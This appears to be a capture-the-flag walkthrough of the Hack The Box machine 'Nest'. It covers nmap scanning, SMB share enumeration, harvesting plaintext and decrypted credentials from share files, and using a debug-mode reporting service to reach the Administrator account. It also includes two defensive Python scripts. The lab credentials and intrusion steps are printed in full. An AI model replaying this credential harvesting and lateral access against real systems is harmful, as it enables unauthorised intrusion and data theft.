NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 10:15 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating Ping Scan at 10:15
Scanning 10.10.10.178 [4 ports]
Completed Ping Scan at 10:15, 0.48s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.19s elapsed
Initiating SYN Stealth Scan at 10:15
Scanning 10.10.10.178 [1000 ports]
Discovered open port 445/tcp on 10.10.10.178
Completed SYN Stealth Scan at 10:15, 23.02s elapsed (1000 total ports)
Initiating Service scan at 10:15
Scanning 1 service on 10.10.10.178
Completed Service scan at 10:15, 30.67s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.178
Retrying OS detection (try #2) against 10.10.10.178
Initiating Traceroute at 10:16
Completed Traceroute at 10:16, 0.71s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:16
Completed Parallel DNS resolution of 2 hosts. at 10:16, 0.38s elapsed
NSE: Script scanning 10.10.10.178.
Initiating NSE at 10:16
Completed NSE at 10:16, 40.08s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.66s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Nmap scan report for 10.10.10.178
Host is up (0.48s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.020 days (since Sat May 30 09:47:48 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental

Host script results:
|_clock-skew: 4m24s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-30T04:50:32
|_  start_date: 2020-05-30T04:23:04

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   702.63 ms 10.10.14.1
2   703.27 ms 10.10.10.178

NSE: Script Post-scanning.
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.35 seconds
           Raw packets sent: 2100 (96.084KB) | Rcvd: 61 (4.750KB)
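The one hardening finding in the scan above is the smb2-security-mode result: signing is enabled but not required, which is what makes SMB relay attacks possible, and the fix is to enforce signing by policy. As an added example (not part of the original walkthrough), here is a small parser that pulls the "Host script results" block out of nmap's normal output and flags SMB2 dialects where signing is not enforced; the sample text is a constructed excerpt carrying the values reported above.

```python
import re

# Constructed excerpt in the shape of the "Host script results" block from
# the nmap output above; values are the ones the scan reported.
SAMPLE_HOST_SCRIPTS = """\
Host script results:
|_clock-skew: 4m24s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-30T04:50:32
|_  start_date: 2020-05-30T04:23:04
"""

# A script header has at most one space between the pipe and the name;
# nested result lines are indented further than that.
HEADER = re.compile(r"^\|_?\s?([\w-]+):\s*(.*)$")
NESTED = re.compile(r"^\|_?\s+(.*\S)\s*$")

def parse_host_scripts(text):
    """Group the '|'-prefixed NSE lines into {script name: [result lines]}."""
    scripts, current = {}, None
    for line in text.splitlines():
        h = HEADER.match(line)
        if h:
            current = h.group(1)
            value = h.group(2).strip()
            scripts[current] = [value] if value else []
            continue
        n = NESTED.match(line)
        if n and current:
            scripts[current].append(n.group(1))
    return scripts

def smb_signing_findings(scripts):
    """Return (dialect, status) pairs for SMB2 dialects where signing is not enforced."""
    findings, dialect = [], None
    for item in scripts.get("smb2-security-mode", []):
        if re.fullmatch(r"[\d.]+:", item):
            dialect = item.rstrip(":")          # e.g. "2.02:" -> "2.02"
        elif "not required" in item.lower() or "disabled" in item.lower():
            findings.append((dialect, item))
    return findings

if __name__ == "__main__":
    parsed = parse_host_scripts(SAMPLE_HOST_SCRIPTS)
    for dialect, status in smb_signing_findings(parsed):
        print(f"SMB {dialect}: {status} -> require signing via policy")
```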
ENUMERATE SMB
root@liquid:~/Desktop/HTB/nest# smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Data            Disk
	IPC$            IPC       Remote IPC
	Secure$         Disk
	Users           Disk
SMB1 disabled -- no workgroup available
RANDOM DATA CHECKING IN SMB FILES
root@liquid:~/Desktop/HTB/nest# smbclient \\\\10.10.10.178\\Data
smb: \> cd Shared\Templates\HR\
smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019

		10485247 blocks of size 4096. 6544122 blocks available
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \Shared\Templates\HR\> cd ../../Maintenance\
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
TempUser : welcome2019
There are a lot of files under the Data share, so rather than fetching them one by one, let's grab them all at once:
root@liquid:~/Desktop/HTB/nest# smbget -R smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt
Downloaded 16.65kB in 81 seconds
After checking all these files, I found this file:
Data//IT/Configs/RU Scanner/RU_Config.xml
But this was encrypted; I tried to decrypt it online, but nothing worked.
Then I proceeded further with the other files and got one more file named
Data//IT/Configs/NotepadPlusPlus/config.xml
So I directly tried to open what we got in the file above using TempUser, and downloaded all those files:
root@liquid:~/Desktop/HTB/nest# smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Proj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 25.18kB in 79 seconds
Looking at this data, we find some interesting code in Module1.vb and Utils.vb. As far as the content we are interested in goes, Module1.vb uses Utils.vb to decrypt the password it retrieves from the RU_config.xml configuration file.
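Opening every downloaded file by hand, as above, is how both the TempUser welcome mail and the RU_config.xml password were found; the owner of a share should run the same check before exposing it. As an added example (not from the original walkthrough), here is a small audit script that walks a local copy of a share and reports where stored passwords appear, redacting the values so the report itself does not leak them. It covers the two shapes seen on this box: the XML <Password> element in RU_config.xml and Password: / Password= lines in text and conf files (the form the HQK Ldap.conf later in the post also uses). The sample file tree and its contents are constructed placeholders, not the real files.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample tree mirroring the share layout in this walkthrough;
# file contents are made-up placeholders, not the real files from the box.
SAMPLE_FILES = {
    "Data/Shared/Templates/HR/Welcome Email.txt":
        "Your temporary credentials are:\nUsername: TempUser\nPassword: example-temp-pass\n",
    "Data/IT/Configs/RU Scanner/RU_config.xml":
        "<ConfigFile><Port>389</Port><Username>svc</Username>"
        "<Password>ZXhhbXBsZS1lbmNyeXB0ZWQ=</Password></ConfigFile>\n",
    "Data/IT/Configs/NotepadPlusPlus/config.xml":
        '<GUIConfigs><GUIConfig name="Theme">Default</GUIConfig></GUIConfigs>\n',
    "HQK/LDAP/Ldap.conf":
        "Domain=example.local\nPort=389\nUser=Administrator\nPassword=examplebase64==\n",
}

# Two shapes of stored secret seen on this box: an XML <Password> element
# and a "Password: value" / "Password=value" line in a text or conf file.
PATTERNS = [
    ("xml-element", re.compile(r"<(pass(?:word|wd)?)>\s*([^<\s]+)\s*</\1>", re.I)),
    ("key-value", re.compile(r"^\s*(pass(?:word|wd)?)\s*[:=]\s*(\S+)", re.I | re.M)),
]

def redact(secret):
    # Keep a two-character prefix so a report never reprints the secret.
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"

def scan_tree(root):
    """Walk a downloaded share copy and report where stored credentials appear."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in {".txt", ".xml", ".conf", ".ini"}:
            continue
        text = path.read_text(errors="replace")
        for kind, rx in PATTERNS:
            for m in rx.finditer(text):
                findings.append({"file": path.relative_to(root).as_posix(),
                                 "kind": kind, "value": redact(m.group(2))})
    return findings

def demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            p = Path(root, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(content)
        return scan_tree(root)
```

Running `demo()` returns one finding per file that holds a password; the Notepad++ config, which has none, is correctly skipped.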
Here I took the help of my friend, who had already completed this:
C.Smith : xRxRxPANCAK3SxRxRx
Let's get user.txt:
root@liquid:~/Desktop/HTB/nest# smbget -R smb://10.10.10.178/Users/C.Smith -U C.Smith
Password for [C.Smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user C.Smith
smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/C.Smith/user.txt
Now let's look at the password file:
cat Debug\ Mode\ Password.txt
Password WBQ201953D8w
GETTING ROOT ACCESS
Let's telnet to the target IP on the port we got from the files above and during the nmap scan:
root@liquid:~/Desktop/HTB/nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>ls
Unrecognised command
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir 1
Error: The specified directory does not exist
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>setdir 1
Error: The specified directory does not exist
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir 2
Error: The specified directory does not exist
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Here we got our password for Administrator, but it is also encoded.
Here I took the help of my friend again.
My weak part is debugging.
We just need to debug the given exe files and we will get our password:
Administrator : XtH4nkS4Pl4y1nGX
Now let's log in using Administrator:
root@liquid:~/Desktop/HTB/nest# smbclient \\\\10.10.10.178\\C$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 02:20:50 2020
  ..                                 DR        0  Sun Jan 26 02:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
  root.txt                            A       32  Mon Aug  5 18:27:26 2019

		10485247 blocks of size 4096. 6544088 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE